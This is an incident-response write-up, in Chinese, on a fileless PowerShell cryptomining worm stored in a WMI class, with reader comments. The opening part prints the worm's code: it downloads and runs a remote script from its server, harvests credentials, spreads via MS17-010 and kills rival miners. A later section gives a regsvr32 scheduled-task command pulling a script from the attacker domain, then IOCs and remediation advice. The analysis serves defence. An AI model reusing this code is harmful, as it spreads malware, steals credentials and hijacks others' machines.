
 

    if ($i -eq 1){

 

        if ($avgs[1] -ne 0){

 

            if (($avgs[0] -le$avgs[1]) -and ($avgs[0] -ne 0)){

 

                $nic = $se[0]

 

                break

 

            }else{

 

                $nic = $se[1]

 

                break

 

            }

 

        }

 

    }

 

    if ($i -eq 2){

 

        if (($avgs[2] -le 300) -and($avgs[2] -ne 0)){

 

            $nic = $se[2]

 

            break

 

        }

 

    }

 

    if ($i -eq 3){

 

        if ($avgs[3] -ne 0){

 

            if (($avgs[2] -le$avgs[3]) -and ($avgs[2] -ne 0)){

 

                $nic = $se[2]

 

                break

 

            }else{

 

                $nic = $se[3]

 

                break

 

            }

 

        }

 

    }

 

}

 

//如果服务端版本不等于本地端版本,则下载服务端的antivirus.ps1

 

$nic=$nic+(':'+'443')

 

$ver=(New-ObjectNet.WebClient).DownloadString("http://$nic/ver.txt").Trim()

 

if($ver -ne $null){

 

    $ver_tmp=([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ver'].Value

 

    if($ver -ne $ver_tmp){

 

        IEX (New-ObjectNet.WebClient).DownloadString("http://$nic/antivirus.ps1")

 

        return

 

    }

 

}

 

//获取开机时间并进行定义

 

$stime=[Environment]::TickCount

 

//执行WmiClass里root\default:System_Anti_Virus_Core-"funs"属性内容,释放WMI exec和永恒之蓝攻击代码

 

$funs = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['funs'].Value

 

$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))

 

iex $defun

 

//在wmi对象里查找root\subscription空间,定位windows系统日志,删除

 

Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription |Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject

 

//按cpu大小递减方式逐个获取powershell.exe进程ID

 

[array]$psids= get-process -name powershell |sort cpu -Descending|ForEach-Object {$_.id}

 

$tcpconn = netstat -anop tcp

 

$exist=$False

 

//判断本机是否在给自己挖矿,例如已运行的powershell.exe和外部地址的80或14444或14433端口是否有已建立的TCP连接,否则循环

 

if ($psids -ne $null )

 

{

 

    foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if ($line -eq $null)

 

        {continue}

 

        if (($psids -contains$line[-1]) -and $t.contains("ESTABLISHED") -and($t.contains(":80 ") -or $t.contains(":14444") -or$t.contains(":14433")) )

 

        {

 

            $exist=$true

 

            break

 

        }

 

    }

 

}

 

!!!

 

RunDDOS "cohernece.exe"

 

KillBot('System_Anti_Virus_Core')

 

//杀掉其他挖矿程序,例如与外部端口3333,55555,7777已建立连接的挖矿程序

 

foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if (!($line -is[array])){continue}

 

        if(($line[-3].contains(":3333") -or$line[-3].contains(":5555") -or$line[-3].contains(":7777")) -and$t.contains("ESTABLISHED"))

 

        {

 

            $evid=$line[-1]

 

            Get-Process -id $evid| stop-process -force

 

        }

 

    }

 

//如果没有挖矿,例如本机没有连接外部14444或14433端口和已运行powershell.exe小于8个,执行WmiClass的root\default:System_Anti_Virus_Core-"mon"和"funs"属性内容进行挖矿和内网渗透。

 

if (!$exist -and ($psids.count -le 8))

 

{

 

    $cmdmon="powershell -NoP-NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock-ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""

 

    $vbs = New-Object -ComObjectWScript.Shell

 

    $vbs.run($cmdmon,0)

 

}

 

//取WmiClass的root\default:System_Anti_Virus_Core-"mimi"属性内容赋给$mimi,并检查长度是否32位,如果不是将该内容输出至temp\a25hY2tlcmVk.txt文件

 

$NTLM=$False

 

$mimi = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['mimi'].Value

 

$a, $NTLM= Get-creds $mimi $mimi

 

if (($a -Split " ")[2].length -ne 32)

 

{

 

    ($a -Split " ")[2] |Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"

 

}

 

$Networks = [System.Net.DNS]::GetHostByName($null).AddressList

 

//将"ipsu"属性内容赋值给$ipsu

 

$ipsu = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value

 

//将"i17"属性内容赋值给$i17

 

$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value

 

//将"sc"属性内容赋值给$scba

 

$scba= ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['sc'].Value

 

//将"sc"属性内容转换成8位无符号整数数组

 

[byte[]]$sc=[System.Convert]::FromBase64String($scba)

 

foreach ($Network in $Networks)

 

{

 

//格式化IP地址

 

    $IPAddress  = $Network.IPAddressToString

 

//判断自身IP地址是否为空

 

    if ($IPAddress -match'^169.254'){continue}

 

    $SubnetMask  = '255.255.255.0'

 

//将Get-networkrange到的IP和掩码赋值给$ips_c

 

    $ips_c=Get-networkrange$IPAddress $SubnetMask

 

//将Get-IpInB到的IP赋值给$ips_b

 

    $ips_b=Get-IpInB $IPAddress

 

    $ips=$ips_c+$ips_b

 

    $tcpconn = netstat -anop tcp

 

//取tcp连接是已建立状态且不包含127.0.0.1,并不是自己连自己,最后类似入栈行为

 

    foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if (!($line -is[array])){continue}

 

        if ($line.count -le4){continue}

 

//分割外部地址并只取IP

 

        $i=$line[-3].split(':')[0]

 

//如果tcp连接是已建立状态且不包含127.0.0.1,并不是自己连自己则继续

 

        if ( ($line[-2] -eq'ESTABLISHED') -and  ($i -ne '127.0.0.1')-and ($ips -notcontains $i))

 

        {

 

            $ips+=$i

 

        }

 

    }

 

//如果开机时间小于1.5个小时则继续

 

    if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

 

    foreach ($ip in $ips)

 

    {

 

        if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

 

        if ($ip -eq$IPAddress){continue}

 

//MS17-010永恒之蓝攻击

 

                if ((Test-Port $ip)-ne $false -and $ipsu -notcontains $ip)

 

        {

 

            $re=0

 

            if ($a.count -ne 0)

 

            {$re = test-ip -ip $ip-creds $a  -nic $nic -ntlm $NTLM }

 

            if ($re -eq 1){$ipsu=$ipsu +" "+$ip}

 

            else

 

            {

 

                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)

 

                if ($vul -and $i17-notcontains $ip)

 

                {

 

                   $res=eb7 $ip $sc

 

                   if (!($res -eq$true))

 

                   {eb8 $ip $sc}

 

                   $i17 = $i17 +" "+$ip

 

                }

 

            }

 

        }

 

    }

 

 }

 

//赋值给staticClass

 

$StaticClass=New-ObjectManagement.ManagementClass('root\default:System_Anti_Virus_Core')

 

//wmiexec攻击成功的失陷主机IP赋值给StaticClass的ipsu

 

$StaticClass.SetPropertyValue('ipsu' ,$ipsu)

 

//推送更新

 

$StaticClass.Put()

 

//永恒之蓝攻击成功将失陷主机IP赋值给StaticClass的i17

 

$StaticClass.SetPropertyValue('i17' ,$i17)

 

//推送更新

 

$StaticClass.Put()

 

 

2.8 powershell.exe(PID 3180)

内容和上一个powershell载荷重复,详见目录2.7。

2.9 WmiClass检查

根据分析PID 3964内存中的内容,发现各种恶意内容都储存在WMI root\default:System_Anti_Virus_Core中,如需要调用,也是直接加载到内存中执行,即实现本地无文件挖矿和内网渗透。

Windows自带wbemtest.exe工具可以管理Windows Management Instrumentation。下拉框至最底部,发现PID 3964内存数据中存在的各个属性。

2.9.1 ver属性(由于不会代码,以下部分内容从数据包层面进行功能验证)

查询DNS记录,并ping测试服务端在线情况。

数据包显示第一个动作即是验证版本,如版本不一致即下载antivirus.ps1。

更新完成之后服务端和本地端版本一致。

服务端版本

 

本地版本

 

2.9.2 funs属性

对funs内容进行解码并上传云端进行杀毒。

 

 

2.9.3 ipsu/i17/mimi/sc属性

 

ipsu和i17由于wmiexec和MS17-010没有攻击成功所以属性没有赋值。

 

mimi和sc由于技术有限,未继续进行分析。

 

2.9.4 mon属性

 

技术有限,未在代码层面进行分析,PID 3180会释放mon内容进行挖矿行为。

 

2.9.5 内网渗透

 

根据PID 3964和PID 3180内存中的数据,分析两个程序都会释放funs内容以进行内网渗透。

 

从ARP层面判断存活主机:

 

从TCP三次握手机制判断目标范围内的445端口是否开启:

 

2.10 antivirus.ps1检查

 

由于PID 3964 get该文件并加载到内存后没有存储行为,且利用浏览器使用相同的请求头部也无法下载该文件,导致无法继续分析(后来发现在命令行中运行然后重定向到文件 中即可对其进行分析)。根据该进程判断该文件至少包括修改WmiClass、下载cohernece.exe等恶意程序的功能。

 

2.11 cohernece.exe检查

 

该文件2019年1月12日1:30生成。

 

同目录下还存在java-log-9527.log,经查阅资料,该文件是cohernece.exe的攻击载荷。

 

2.12 关联检查

 

根据名称进行搜索。发现多个目录下存在该文件。如下图红框所示:

 

根据该文件生成时间进行搜索,同一时间在极其隐蔽的目录下:

 

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5

 

每隔20分钟就会自动生成一个htm文件。

 

对其进行解码,如下图所示,按名称理解主要作用于检查版本或本地/云端版本不一致时进行更新。

 

 

下载内容如下简示:

 

由于其生成时间固定,查询到任务计划时发现恶意定时任务:

 

 

 

两个任务计划定时操作:

/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll

 

如上链接测试无法下载,80替换443后可以下载。

 

2.13 Ioc

 

2.13.1 url

 

update.7h4uk.com

 

info.7h4uk.com

 

f4keu.7h4uk.com

 

xmr-eu1.nanopool.org

2.13.2 ip

 

185.234.217.139

 

185.234.217.111

 

111.90.145.52

 

151.80.144.25

 

51.255.34.118

 

51.15.65.182

 

164.132.109.110

 

213.32.29.143

 

51.15.54.102

 

51.15.78.68

 

5.196.13.29

 

217.182.169.148

 

5.196.23.240

2.13.3 md5

 

cohernece.exe 4fe2de6fbb278e56c23e90432f21f6c8

 

9527.log      c2e31d4b8d6f9169d4557587b9d595ec

三、应急处置

 

根据现场情况经用户沟通确认,通过内网主机进行以下工作完成了对恶意程序的清除:

1.任务计划删除定时任务;

2.按顺序kill PID 3964、3180和cohernece.exe;

3.已在WMI中将root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver属性删除;

4.已删除cohernece.exe和antivirus*.htm。

四、基础防护能力检查

 

4.1 防火墙和MS17010

 

在本地未安装MS17010相关补丁的情况下对外开放了445端口,且无第三方杀软或应用层防火墙,本地网络层防火墙未启用,无法针对入栈访问本地高危端口行为进行访问控制。

 

 

4.2 Tomcat日志

 

Tomcat访问日志功能未启用。

 

 

五、分析结论和处理建议

 

5.1 分析结论

 

本次内网主机CPU使用率过高经检查是因为存在挖矿行为导致,由于tomcat未启用访问日志记录功能,未在WEB层面进行攻击溯源。但根据目录4.1的分析,完全可以通过目录2中的恶意程序对内网防护不到位的主机实现自动化内网渗透。

 

5.2 处理建议

 

为减少被恶意行为取得管理权限后进行勒索或挖矿等发生安全事件的可能性,建议至少包括但不限于:

1.加强准入控制,访问应用系统建议必须经过多层应用防护;

2.内网管理服务器建议必须经过堡垒机管控和审计,外网管理服务器建议必须通过VPN加密进入内网后再通过堡垒机进行管控和审计;

3.加强准出控制,建议对互联网或对外提供服务的应用系统,在互联网出口只做端口映射或双向地址置换,如无必要,建议禁止互联网出口代理应用系统的IP出互联网;

4.应用系统建议经过代码审计和渗透测试后再对互联网或对外提供服务;

5.建议不要因为是测试服务器而降低其安全标准,基于木桶原理,以防测试服务器发生安全事件被获取权限从而可以横向渗透内网,因此再次强调业务系统服务器如无必要,禁止主动访问互联网,以防获取管理权限后反弹管理权限至互联网;

6.办公终端需预防U盘钓鱼或交叉感染恶意程序,尽量不要打开来历不明的文档、程序、邮件中的附件,防止社工钓鱼。

*本文原创作者:竹林再遇北极熊,本文属于FreeBuf原创奖励计划,未经许可禁止转载

竹林再遇北极熊 1 篇文章 等级: 1

|

|

发表评论

已有 10 条评论

  • 123  2019-07-05 回复 1楼

     

    直接把winmgmt服务关了完事

    亮了(1)

    • langyajiekou  (6级)  2019-07-05 回复

       

      @ 123 有些管理需要,不能关停的。

      亮了(0)

    • 竹林再遇北极熊  (1级) 安徽三实  2019-07-07 回复

       

      winmgmt只是运行其的平台,只要黑进来了该怎么开还是在怎么开,说到底还是您说的这个思路、这个安全意识必须要有,高危的,不是必须的,站在运维的角度或站在应急响应的角度,真心不建议对外开放或者运行,不然的话根本不会存在这样的应急。

      亮了(0)

  • A-new  (1级)  2019-07-05 回复 2楼

     

    powerghost,这个很久之前就有相关文章了

    亮了(0)

    • 竹林再遇北极熊  (1级) 安徽三实  2019-07-07 回复

       

      首先,我特意搜了以下freebuf的“关于我们”,里面的一些内容和本次回复是不矛盾的,而且经过编辑审核,肯定不会和其他文章重合。
      另外我老大很久之前和我们说过,会的问题自认为肯定都是很简单的,如果你处理过一个问题,是你不会的,处理成功对自己是一次提升;写出来,是一次提升,说出来,说不通,或者别人问问题你不会,你搞懂了,又是一次提升。其目的就不单单是分享了,更多的还是提升自己。

      亮了(3)

  • Meloncn  2019-07-06 回复 3楼

     

    最近我们的集群中也发现了这个东西

    亮了(0)

    • 竹林再遇北极熊  (1级) 安徽三实  2019-07-07 回复

       

      “我们的集群”说明不是运维就是甲方,成功需要千万滴汗水组成,但是失败只要一种因素,幸亏不是勒索,只是CPU高一点而已,不然领导公务再繁忙,眼里也只装的下事故两个字。

      亮了(0)

  • 热心市民王先生  (1级)  2019-07-06 回复 4楼

     

    最近我们这边集群中也发现了这个东西,会扫描你的内网连接其他主机445端口,还会进行密码爆破。(山东潍坊)

    亮了(0)

    • 竹林再遇北极熊  (1级) 安徽三实  2019-07-07 回复

       

      单说一个扫描的话,有两个地方需要注意,其中一个就是网关禁止,哪怕是超融合环境,虚拟化里的也是有网关的,找到进行限制,不管是根据扫描特征还是五元组都可以进行控制。其二就是服务器本地限制,因为不跨网段不经过网关。另外服务器本地都可对登录次数进行限制的。

      亮了(0)

  • 一个摸索安全的人  2019-07-08 回复 5楼

     

    这个我们在甲方环境也发现了问题,主要是当时发现了定时任务,所以当时全局做了powershell的进程控制,然后再把计划任务删除掉,kill掉作者所述的这几个进程,所以看到作者的复盘让我加深了印象,谢谢!

    亮了(0)

相关文章

人已赞赏
安全教程

记一次入侵应急响应分析 -20190404

2020-2-13 22:11:33

安全教程

投递恶意lnk使用JwsclTerminalServer实现远程控制和信息获取

2020-2-13 22:12:08

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
有新消息 消息中心
搜索